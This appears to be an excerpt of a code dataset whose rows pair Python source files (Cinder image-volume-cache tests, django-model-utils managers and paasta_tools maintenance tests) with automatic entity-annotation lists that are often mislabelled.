self.assertEqual('INFO', msg['priority'])
self.assertEqual(self.volume.host, msg['payload']['host'])
self.assertEqual(image_id, msg['payload']['image_id'])
self.assertEqual(1, len(self.notifier.notifications))
@mock.patch('cinder.objects.Volume.get_by_id')
def test_get_entry_needs_update(self, mock_volume_by_id):
cache = self._build_cache()
entry = self._build_entry()
image_meta = {
'is_public': True,
'owner': '70a599e0-31e7-49b7-b260-868f441e862b',
'properties': {
'virtual_size': '1.7'
},
'updated_at': entry['image_updated_at'] + timedelta(hours=2)
}
(self.mock_db.
image_volume_cache_get_and_update_last_used.return_value) = entry
mock_volume = mock.MagicMock()
mock_volume_by_id.return_value = mock_volume
found_entry = cache.get_entry(self.context,
self.volume_ovo,
entry['image_id'],
image_meta)
# Expect that the cache entry is not returned and the image-volume
# for it is deleted.
self.assertIsNone(found_entry)
self.mock_volume_api.delete.assert_called_with(self.context,
mock_volume)
msg = self.notifier.notifications[0]
self.assertEqual('image_volume_cache.miss', msg['event_type'])
self.assertEqual('INFO', msg['priority'])
self.assertEqual(self.volume.host, msg['payload']['host'])
self.assertEqual(entry['image_id'], msg['payload']['image_id'])
self.assertEqual(1, len(self.notifier.notifications))
def test_create_cache_entry(self):
cache = self._build_cache()
entry = self._build_entry()
image_meta = {
'updated_at': entry['image_updated_at']
}
self.mock_db.image_volume_cache_create.return_value = entry
created_entry = cache.create_cache_entry(self.context,
self.volume_ovo,
entry['image_id'],
image_meta)
self.assertEqual(entry, created_entry)
self.mock_db.image_volume_cache_create.assert_called_once_with(
self.context,
self.volume_ovo.host,
self.volume_ovo.cluster_name,
entry['image_id'],
entry['image_updated_at'].replace(tzinfo=None),
self.volume_ovo.id,
self.volume_ovo.size
)
def test_ensure_space_unlimited(self):
cache = self._build_cache(max_gb=0, max_count=0)
has_space = cache.ensure_space(self.context, self.volume)
self.assertTrue(has_space)
self.volume.size = 500
has_space = cache.ensure_space(self.context, self.volume)
self.assertTrue(has_space)
def test_ensure_space_no_entries(self):
cache = self._build_cache(max_gb=100, max_count=10)
self.mock_db.image_volume_cache_get_all.return_value = []
self.volume_ovo.size = 5
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertTrue(has_space)
self.volume_ovo.size = 101
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertFalse(has_space)
def test_ensure_space_need_gb(self):
cache = self._build_cache(max_gb=30, max_count=10)
mock_delete = mock.patch.object(cache, '_delete_image_volume').start()
entries = []
entry1 = self._build_entry(size=12)
entries.append(entry1)
entry2 = self._build_entry(size=5)
entries.append(entry2)
entry3 = self._build_entry(size=10)
entries.append(entry3)
self.mock_db.image_volume_cache_get_all.return_value = entries
self.volume_ovo.size = 15
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertTrue(has_space)
self.assertEqual(2, mock_delete.call_count)
mock_delete.assert_any_call(self.context, entry2)
mock_delete.assert_any_call(self.context, entry3)
def test_ensure_space_need_count(self):
cache = self._build_cache(max_gb=30, max_count=2)
mock_delete = mock.patch.object(cache, '_delete_image_volume').start()
entries = []
entry1 = self._build_entry(size=10)
entries.append(entry1)
entry2 = self._build_entry(size=5)
entries.append(entry2)
self.mock_db.image_volume_cache_get_all.return_value = entries
self.volume_ovo.size = 12
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertTrue(has_space)
self.assertEqual(1, mock_delete.call_count)
mock_delete.assert_any_call(self.context, entry2)
def test_ensure_space_need_gb_and_count(self):
cache = self._build_cache(max_gb=30, max_count=3)
mock_delete = mock.patch.object(cache, '_delete_image_volume').start()
entries = []
entry1 = self._build_entry(size=10)
entries.append(entry1)
entry2 = self._build_entry(size=5)
entries.append(entry2)
entry3 = self._build_entry(size=12)
entries.append(entry3)
self.mock_db.image_volume_cache_get_all.return_value = entries
self.volume_ovo.size = 16
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertTrue(has_space)
self.assertEqual(2, mock_delete.call_count)
mock_delete.assert_any_call(self.context, entry2)
mock_delete.assert_any_call(self.context, entry3)
def test_ensure_space_cant_free_enough_gb(self):
cache = self._build_cache(max_gb=30, max_count=10)
mock_delete = mock.patch.object(cache, '_delete_image_volume').start()
entries = [self._build_entry(size=25)]  # one entry; list(dict) would yield only its keys
self.mock_db.image_volume_cache_get_all.return_value = entries
self.volume_ovo.size = 50
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertFalse(has_space)
mock_delete.assert_not_called()
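# Illustrative sketch (an addition, not from the cinder sources): the
# ensure_space tests above are consistent with an eviction predicate roughly
# like this, applied while freeing cache entries until both limits would hold:
#
#   def _needs_eviction(entries, new_size, max_gb, max_count):
#       used_gb = sum(e['size'] for e in entries)
#       too_big = max_gb and used_gb + new_size > max_gb
#       too_many = max_count and len(entries) + 1 > max_count
#       return too_big or too_many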
",12065,"[['PERSON', 'fake_constants'], ['LOCATION', 'TestCase'], ['PERSON', ""msg['priority""], ['PERSON', ""msg['priority""], ['PERSON', ""msg['priority""], ['PERSON', 'mock_volume_by_id.return_value = mock_volume\n\n '], ['PERSON', ""msg['priority""], ['PERSON', 'entry2'], ['PERSON', 'entry3 = self._build_entry(size=10'], ['PERSON', 'max_count=2'], ['PERSON', 'entry2'], ['PERSON', 'entry2'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['URL', 'cinder.im'], ['URL', 'self.mo'], ['URL', 'mock.Mo'], ['URL', 'self.mo'], ['URL', 'mock.Mo'], ['URL', 'self.co'], ['URL', 'ctxt.ge'], ['URL', 'self.co'], ['URL', 'cache.Im'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'cache.no'], ['URL', 'self.no'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'id.re'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'id.re'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.co'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'self.notifier.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'self.mo'], ['URL', 'used.re'], ['URL', 'ovo.cl'], ['URL', 'self.volume.cl'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'used.as'], ['URL', 'self.co'], ['URL', 'self.notifier.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'self.mo'], ['URL', 'used.re'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'mock.pa'], ['URL', 'cinder.objects.Volume.ge'], ['URL', 'self.mo'], ['URL', 'used.re'], ['URL', 'mock.Ma'], ['URL', 'id.re'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'api.delete.as'], ['URL', 'self.co'], ['URL', 'self.notifier.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'create.re'], ['URL', 'cache.cr'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'create.as'], ['URL', 'self.co'], ['URL', 'ovo.cl'], ['URL', 'ovo.id'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.volume.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'delete.ca'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'delete.ca'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'delete.ca'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 
'mock.pa'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'delete.as']]"
73,"from types import ClassType
import warnings
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.db.models.fields.related import OneToOneField
from django.db.models.manager import Manager
from django.db.models.query import QuerySet
import django
class InheritanceQuerySet(QuerySet):
def select_subclasses(self, *subclasses):
if not subclasses:
subclasses = [rel.var_name for rel in self.model._meta.get_all_related_objects()
if isinstance(rel.field, OneToOneField)
and issubclass(rel.field.model, self.model)]
new_qs = self.select_related(*subclasses)
new_qs.subclasses = subclasses
return new_qs
def _clone(self, klass=None, setup=False, **kwargs):
for name in ['subclasses', '_annotated']:
if hasattr(self, name):
kwargs[name] = getattr(self, name)
return super(InheritanceQuerySet, self)._clone(klass, setup, **kwargs)
def annotate(self, *args, **kwargs):
qset = super(InheritanceQuerySet, self).annotate(*args, **kwargs)
qset._annotated = [a.default_alias for a in args] + kwargs.keys()
return qset
def get_subclass(self, obj):
""""""
FIX see https://bitbucket.PI:KEY
and https://bitbucket.org/carljm/django-model-utils/issue/15/mti-problem-with-select_subclasses
""""""
def get_attribute(obj, s):
try:
return getattr(obj,s, False)
except obj.__class__.DoesNotExist:
return False
if django.VERSION[0:2] < (1, 5):
sub_obj = [getattr(obj, s) for s in self.subclasses if getattr(obj, s)] or [obj]
else:
sub_obj = [getattr(obj, s) for s in self.subclasses if get_attribute(obj, s)] or [obj]
return sub_obj[0]
def iterator(self):
iter = super(InheritanceQuerySet, self).iterator()
if getattr(self, 'subclasses', False):
for obj in iter:
sub_obj = self.get_subclass(obj)
if getattr(self, '_annotated', False):
for k in self._annotated:
setattr(sub_obj, k, getattr(obj, k))
yield sub_obj
else:
for obj in iter:
yield obj
class InheritanceManager(models.Manager):
use_for_related_fields = True
def get_query_set(self):
return InheritanceQuerySet(self.model)
def select_subclasses(self, *subclasses):
return self.get_query_set().select_subclasses(*subclasses)
def get_subclass(self, *args, **kwargs):
return self.get_query_set().select_subclasses().get(*args, **kwargs)
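# Usage sketch (an added example; Place and Restaurant are hypothetical models):
# with InheritanceManager on a concrete base model, queries can return the most
# derived instances directly:
#
#   class Place(models.Model):
#       objects = InheritanceManager()
#
#   class Restaurant(Place):
#       serves_pizza = models.BooleanField(default=False)
#
#   # each result is a Place or a Restaurant, as appropriate
#   for place in Place.objects.select_subclasses():
#       print type(place)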
class InheritanceCastMixin(object):
def cast(self):
results = tuple(self.values_list('pk', 'real_type'))
type_to_pks = {}
for pk, real_type_id in results:
type_to_pks.setdefault(real_type_id, []).append(pk)
content_types = ContentType.objects.in_bulk(type_to_pks.keys())
pk_to_child = {}
for real_type_id, pks in type_to_pks.iteritems():
content_type = content_types[real_type_id]
child_type = content_type.model_class()
children = child_type._default_manager.in_bulk(pks)
for pk, child in children.iteritems():
pk_to_child[pk] = child
children = []
# sort children into same order as parents where returned
for pk, real_type_id in results:
children.append(pk_to_child[pk])
return children
class QueryManager(models.Manager):
def __init__(self, *args, **kwargs):
if args:
self._q = args[0]
else:
self._q = models.Q(**kwargs)
super(QueryManager, self).__init__()
def order_by(self, *args):
self._order_by = args
return self
def get_query_set(self):
qs = super(QueryManager, self).get_query_set().filter(self._q)
if hasattr(self, '_order_by'):
return qs.order_by(*self._order_by)
return qs
class PassThroughManager(models.Manager):
""""""
Inherit from this Manager to enable you to call any methods from your
custom QuerySet class from your manager. Simply define your QuerySet
class, and return an instance of it from your manager's `get_query_set`
method.
Alternately, if you don't need any extra methods on your manager that
aren't on your QuerySet, then just pass your QuerySet class to the
``for_queryset_class`` class method.
class PostQuerySet(QuerySet):
def enabled(self):
return self.filter(disabled=False)
class Post(models.Model):
objects = PassThroughManager.for_queryset_class(PostQuerySet)()
""""""
# pickling causes recursion errors
_deny_methods = ['__getstate__', '__setstate__', '_db']
def __init__(self, queryset_cls=None):
self._queryset_cls = queryset_cls
super(PassThroughManager, self).__init__()
def __getattr__(self, name):
if name in self._deny_methods:
raise AttributeError(name)
return getattr(self.get_query_set(), name)
def get_query_set(self):
if self._queryset_cls is not None:
kargs = {'model': self.model}
if hasattr(self, '_db'):
kargs['using'] = self._db
return self._queryset_cls(**kargs)
return super(PassThroughManager, self).get_query_set()
@classmethod
def for_queryset_class(cls, queryset_cls):
class _PassThroughManager(cls):
def __init__(self):
return super(_PassThroughManager, self).__init__()
def get_query_set(self):
kwargs = {}
if hasattr(self, ""_db""):
kwargs[""using""] = self._db
return queryset_cls(self.model, **kwargs)
return _PassThroughManager
def manager_from(*mixins, **kwds):
""""""
Returns a Manager instance with extra methods, also available and
chainable on generated querysets.
(By George Sakkis, originally posted at
http://djangosnippets.org/snippets/2117/)
:param mixins: Each ``mixin`` can be either a class or a function. The
generated manager and associated queryset subclasses extend the mixin
classes and include the mixin functions (as methods).
:keyword queryset_cls: The base queryset class to extend from
(``django.db.models.query.QuerySet`` by default).
:keyword manager_cls: The base manager class to extend from
(``django.db.models.manager.Manager`` by default).
""""""
warnings.warn(
""manager_from is pending deprecation; use PassThroughManager instead."",
PendingDeprecationWarning,
stacklevel=2)
# collect separately the mixin classes and methods
bases = [kwds.get('queryset_cls', QuerySet)]
methods = {}
for mixin in mixins:
if isinstance(mixin, (ClassType, type)):
bases.append(mixin)
else:
try: methods[mixin.__name__] = mixin
except AttributeError:
raise TypeError('Mixin must be class or function, not %s' %
mixin.__class__)
# create the QuerySet subclass
id = hash(mixins + tuple(kwds.iteritems()))
new_queryset_cls = type('Queryset_%d' % id, tuple(bases), methods)
# create the Manager subclass
bases[0] = manager_cls = kwds.get('manager_cls', Manager)
new_manager_cls = type('Manager_%d' % id, tuple(bases), methods)
# and finally override new manager's get_query_set
super_get_query_set = manager_cls.get_query_set
def get_query_set(self):
# first honor the super manager's get_query_set
qs = super_get_query_set(self)
# and then try to bless the returned queryset by reassigning it to the
# newly created Queryset class, though this may not be feasible
if not issubclass(new_queryset_cls, qs.__class__):
raise TypeError('QuerySet subclass conflict: cannot determine a '
'unique class for queryset instance')
qs.__class__ = new_queryset_cls
return qs
new_manager_cls.get_query_set = get_query_set
return new_manager_cls()
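# Usage sketch (an added example; Post and published() are hypothetical): mixin
# functions become methods on both the generated manager and its querysets, so
# they chain like normal queryset methods:
#
#   def published(self):
#       return self.filter(is_published=True)
#
#   class Post(models.Model):
#       is_published = models.BooleanField(default=False)
#       objects = manager_from(published)
#
#   Post.objects.published().order_by('-id')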
",8353,"[['PERSON', 'qset = super(InheritanceQuerySet'], ['NRP', 'sub_obj'], ['PERSON', 'order_by'], ['PERSON', 'kargs'], ['PERSON', 'kwds'], ['PERSON', 'George Sakkis'], ['PERSON', 'mixin.__class'], ['LOCATION', 'qs.__class'], ['URL', 'https://bitbucket.org/carljm/django-model-utils/issue/15/mti-problem-with-select_subclasses'], ['URL', 'http://djangosnippets.org/snippets/2117/'], ['URL', 'django.contrib.contenttypes.mo'], ['URL', 'django.db.models.fields.re'], ['URL', 'django.db.models.ma'], ['URL', 'django.db.mo'], ['URL', 'rel.va'], ['URL', 'self.mo'], ['URL', 'meta.ge'], ['URL', 'rel.fi'], ['URL', 'rel.field.mo'], ['URL', 'self.mo'], ['URL', 'self.se'], ['URL', 'qs.su'], ['URL', 'a.de'], ['URL', 'kwargs.ke'], ['URL', 'django.VE'], ['URL', 'self.su'], ['URL', 'self.su'], ['URL', 'self.ge'], ['URL', 'models.Ma'], ['URL', 'self.mo'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.va'], ['URL', 'pks.se'], ['URL', 'ContentType.objects.in'], ['URL', 'pks.ke'], ['URL', 'pks.it'], ['URL', 'type.mo'], ['URL', 'manager.in'], ['URL', 'children.it'], ['URL', 'models.Ma'], ['URL', 'models.Ma'], ['URL', 'self.fi'], ['URL', 'models.Mo'], ['URL', 'PassThroughManager.fo'], ['URL', 'self.ge'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'django.db.mo'], ['URL', 'django.db.models.manager.Ma'], ['URL', 'kwds.ge'], ['URL', 'kwds.it'], ['URL', 'kwds.ge'], ['URL', 'cls.ge'], ['URL', 'cls.ge']]"
74,"# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the ""License"");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an ""AS IS"" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from paasta_tools import paasta_maintenance
@mock.patch(""paasta_tools.mesos_maintenance.is_host_drained"", autospec=True)
@mock.patch(
""paasta_tools.mesos_maintenance.get_hosts_past_maintenance_start"", autospec=True
)
def test_is_safe_to_kill(mock_get_hosts_past_maintenance_start, mock_is_host_drained):
mock_is_host_drained.return_value = False
mock_get_hosts_past_maintenance_start.return_value = []
assert not paasta_maintenance.is_safe_to_kill(""blah"")
mock_is_host_drained.return_value = False
mock_get_hosts_past_maintenance_start.return_value = [""blah""]
assert paasta_maintenance.is_safe_to_kill(""blah"")
mock_is_host_drained.return_value = True
mock_get_hosts_past_maintenance_start.return_value = [""blah""]
assert paasta_maintenance.is_safe_to_kill(""blah"")
mock_is_host_drained.return_value = True
mock_get_hosts_past_maintenance_start.return_value = []
assert paasta_maintenance.is_safe_to_kill(""blah"")
@mock.patch(""paasta_tools.paasta_maintenance.is_hostname_local"", autospec=True)
def test_is_safe_to_drain_rejects_non_localhosts(mock_is_hostname_local,):
mock_is_hostname_local.return_value = False
assert paasta_maintenance.is_safe_to_drain(""non-localhost"") is False
@mock.patch(""paasta_tools.paasta_maintenance.getfqdn"", autospec=True)
@mock.patch(""paasta_tools.paasta_maintenance.gethostname"", autospec=True)
def test_is_hostname_local_works(mock_gethostname, mock_getfqdn):
mock_gethostname.return_value = ""foo""
mock_getfqdn.return_value = ""foo.bar""
assert paasta_maintenance.is_hostname_local(""localhost"") is True
assert paasta_maintenance.is_hostname_local(""foo"") is True
assert paasta_maintenance.is_hostname_local(""foo.bar"") is True
assert paasta_maintenance.is_hostname_local(""something_different"") is False
@mock.patch(
"paasta_tools.paasta_maintenance.utils.load_system_paasta_config", autospec=True
)
def test_are_local_tasks_in_danger_fails_safe_with_false(
mock_load_system_paasta_config,
):
"""If something unexpected happens that we don't know how to
interpret, we make sure that we fail with "False" so that processes
move on and don't deadlock. In general the answer to "is it safe to drain"
is "yes" if mesos can't be reached, etc"""
mock_load_system_paasta_config.side_effect = Exception
assert paasta_maintenance.are_local_tasks_in_danger() is False
@mock.patch(
"paasta_tools.paasta_maintenance.utils.load_system_paasta_config", autospec=True
)
@mock.patch(
"paasta_tools.paasta_maintenance.marathon_services_running_here", autospec=True
)
def test_are_local_tasks_in_danger_is_false_with_nothing_running(
mock_marathon_services_running_here, mock_load_system_paasta_config
):
mock_marathon_services_running_here.return_value = []
assert paasta_maintenance.are_local_tasks_in_danger() is False
@mock.patch(
"paasta_tools.paasta_maintenance.utils.load_system_paasta_config", autospec=True
)
@mock.patch(
"paasta_tools.paasta_maintenance.marathon_services_running_here", autospec=True
)
@mock.patch("paasta_tools.paasta_maintenance.get_backends", autospec=True)
@mock.patch("paasta_tools.paasta_maintenance.is_healthy_in_haproxy", autospec=True)
def test_are_local_tasks_in_danger_is_false_with_an_unhealthy_service(
mock_is_healthy_in_haproxy,
mock_get_backends,
mock_marathon_services_running_here,
mock_load_system_paasta_config,
):
mock_is_healthy_in_haproxy.return_value = False
mock_marathon_services_running_here.return_value = [("service", "instance", 42)]
assert paasta_maintenance.are_local_tasks_in_danger() is False
mock_is_healthy_in_haproxy.assert_called_once_with(42, mock.ANY)
@mock.patch(
"paasta_tools.paasta_maintenance.utils.load_system_paasta_config", autospec=True
)
@mock.patch(
"paasta_tools.paasta_maintenance.marathon_services_running_here", autospec=True
)
@mock.patch("paasta_tools.paasta_maintenance.get_backends", autospec=True)
@mock.patch("paasta_tools.paasta_maintenance.is_healthy_in_haproxy", autospec=True)
@mock.patch("paasta_tools.paasta_maintenance.synapse_replication_is_low", autospec=True)
def test_are_local_tasks_in_danger_is_true_with_an_healthy_service_in_danger(
mock_synapse_replication_is_low,
mock_is_healthy_in_haproxy,
mock_get_backends,
mock_marathon_services_running_here,
mock_load_system_paasta_config,
):
mock_is_healthy_in_haproxy.return_value = True
mock_synapse_replication_is_low.return_value = True
mock_marathon_services_running_here.return_value = [("service", "instance", 42)]
assert paasta_maintenance.are_local_tasks_in_danger() is True
mock_is_healthy_in_haproxy.assert_called_once_with(42, mock.ANY)
assert mock_synapse_replication_is_low.call_count == 1
@mock.patch(
""paasta_tools.paasta_maintenance.load_marathon_service_config"", autospec=True
)
@mock.patch(
""paasta_tools.paasta_maintenance.load_smartstack_info_for_service"", autospec=True
)
@mock.patch(
""paasta_tools.paasta_maintenance.get_expected_instance_count_for_namespace"",
autospec=True,
)
@mock.patch(
""paasta_tools.paasta_maintenance.get_replication_for_services"", autospec=True
)
def test_synapse_replication_is_low_understands_underreplicated_services(
mock_get_replication_for_services,
mock_get_expected_instance_count_for_namespace,
mock_load_smartstack_info_for_service,
mock_load_marathon_service_config,
):
mock_load_marathon_service_config.return_value.get_registrations.return_value = (
""service.main""
)
mock_get_expected_instance_count_for_namespace.return_value = 3
mock_load_smartstack_info_for_service.return_value = {
""local_region"": {""service.main"": ""up""}
}
mock_get_replication_for_services.return_value = {""service.main"": 1}
local_backends = [""foo""]
system_paasta_config = mock.MagicMock()
assert (
paasta_maintenance.synapse_replication_is_low(
service=""service"",
instance=""instance"",
system_paasta_config=system_paasta_config,
local_backends=local_backends,
)
is True
)
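# The predicate under test, reduced to its core (threshold semantics assumed
# from the fixture: 3 instances expected, only 1 replicated, so replication
# counts as low):
def replication_is_low_sketch(expected_count, actual_count):
    return actual_count < expected_count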
@mock.patch(""paasta_tools.paasta_maintenance.gethostbyname"", autospec=True)
def test_is_healthy_in_haproxy_healthy_path(mock_gethostbyname):
mock_gethostbyname.return_value = ""127.0.0.1""
local_port = 42
backends = [
{""status"": ""UP"", ""pxname"": ""service.main"", ""svname"": ""127.0.0.1:42_hostname""}
]
assert (
paasta_maintenance.is_healthy_in_haproxy(
local_port=local_port, backends=backends
)
is True
)
@mock.patch(""paasta_tools.paasta_maintenance.gethostbyname"", autospec=True)
def test_is_healthy_in_haproxy_unhealthy_path(mock_gethostbyname):
mock_gethostbyname.return_value = ""127.0.0.1""
local_port = 42
backends = [
{""status"": ""DOWN"", ""pxname"": ""service.main"", ""svname"": ""127.0.0.1:42_hostname""}
]
assert (
paasta_maintenance.is_healthy_in_haproxy(
local_port=local_port, backends=backends
)
is False
)
@mock.patch(""paasta_tools.paasta_maintenance.gethostbyname"", autospec=True)
def test_is_healthy_in_haproxy_missing_backend_entirely(mock_gethostbyname):
mock_gethostbyname.return_value = ""127.0.0.1""
local_port = 42
backends = [
{
""status"": ""DOWN"",
""pxname"": ""service.main"",
""svname"": ""127.0.0.1:666_otherhostname"",
}
]
assert (
paasta_maintenance.is_healthy_in_haproxy(
local_port=local_port, backends=backends
)
is False
)
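# Backend-matching rule the three haproxy tests above cover, as a sketch
# consistent with the fixtures (not the real paasta_tools implementation): a
# local port is healthy iff some backend whose svname starts with
# '<local_ip>:<port>_' reports status UP.
from socket import gethostbyname, gethostname

def is_healthy_in_haproxy_sketch(local_port, backends):
    local_ip = gethostbyname(gethostname())
    prefix = '%s:%s_' % (local_ip, local_port)
    return any(
        backend['status'] == 'UP' and backend['svname'].startswith(prefix)
        for backend in backends
    )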
",8242,"[['DATE_TIME', '2015-2016'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['LOCATION', 'paasta_maintenance.is_safe_to_drain(""non'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', '@mock.patch(""paasta_tools.paasta_maintenance.is_healthy_in_haproxy'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', '@mock.patch(""paasta_tools.paasta_maintenance.is_healthy_in_haproxy'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['NRP', 'mock_synapse_replication_is_low.call_count =='], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'mock.pa'], ['URL', 'tools.me'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.me'], ['URL', 'maintenance.ge'], ['URL', 'drained.re'], ['URL', 'start.re'], ['URL', 'maintenance.is'], ['URL', 'drained.re'], ['URL', 'start.re'], ['URL', 'maintenance.is'], ['URL', 'drained.re'], ['URL', 'start.re'], ['URL', 'maintenance.is'], ['URL', 'drained.re'], ['URL', 'start.re'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.is'], ['URL', 'local.re'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'gethostname.re'], ['URL', 'getfqdn.re'], ['URL', 'foo.ba'], ['URL', 'maintenance.is'], ['URL', 'maintenance.is'], ['URL', 'maintenance.is'], ['URL', 'foo.ba'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'config.si'], ['URL', 'maintenance.ar'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ma'], ['URL', 'here.re'], ['URL', 'maintenance.ar'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ma'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.is'], ['URL', 'haproxy.re'], ['URL', 'here.re'], ['URL', 'maintenance.ar'], ['URL', 'haproxy.as'], ['URL', 'mock.AN'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ma'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.sy'], ['URL', 'haproxy.re'], ['URL', 'low.re'], ['URL', 'here.re'], ['URL', 'maintenance.ar'], ['URL', 'haproxy.as'], ['URL', 'mock.AN'], ['URL', 'low.ca'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'config.re'], ['URL', 'value.ge'], ['URL', 'registrations.re'], ['URL', 'service.ma'], ['URL', 'namespace.re'], ['URL', 'service.re'], ['URL', 'service.ma'], ['URL', 
'services.re'], ['URL', 'service.ma'], ['URL', 'mock.Ma'], ['URL', 'maintenance.sy'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'gethostbyname.re'], ['URL', 'service.ma'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'gethostbyname.re'], ['URL', 'service.ma'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'gethostbyname.re'], ['URL', 'service.ma'], ['URL', 'maintenance.is']]"
